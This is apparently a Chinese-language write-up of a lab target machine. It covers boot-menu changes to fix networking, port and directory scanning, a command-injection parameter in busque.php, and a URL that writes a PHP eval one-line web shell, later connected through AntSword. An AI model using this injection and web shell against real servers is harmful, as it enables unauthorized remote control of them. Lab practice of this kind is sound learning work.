第0步:
打开靶机,按下shift,出现下图界面

在此页面按下e键,进入如下界面, 将ro 替换为 rw signie init=/bin/bash

替换完毕后,按下Ctrl键+X键,进入如下页面

ip a查看网卡信息

编辑配置文件网卡信息, 英文键盘的斜杠按不出来,需要按数字键盘的斜杠


第一步:确定靶机IP为192.168.179.129

第二步:扫描后台及开放端口


第三步:进行敏感目录及文件扫描

#200
http://192.168.179.129/site/index.html (CODE:200|SIZE:10190)
http://192.168.179.129/site/wordpress/index.html (CODE:200|SIZE:10190)
#端口
192.168.179.129:80
192.168.179.129:21
第四步:访问扫描出来的可能有价值的文件及端口



第五步:发现可以传参的地方,尝试传一个id,得到结果



第六步:进一步,尝试上传一句话木马

#URL
http://192.168.179.129/site/busque.php?buscar=echo '<?php eval($_POST["cmd"]);' > shell.php
第七步:使用蚁剑进行连接

#URL地址
http://192.168.179.129/site/shell.php
FROM IYU_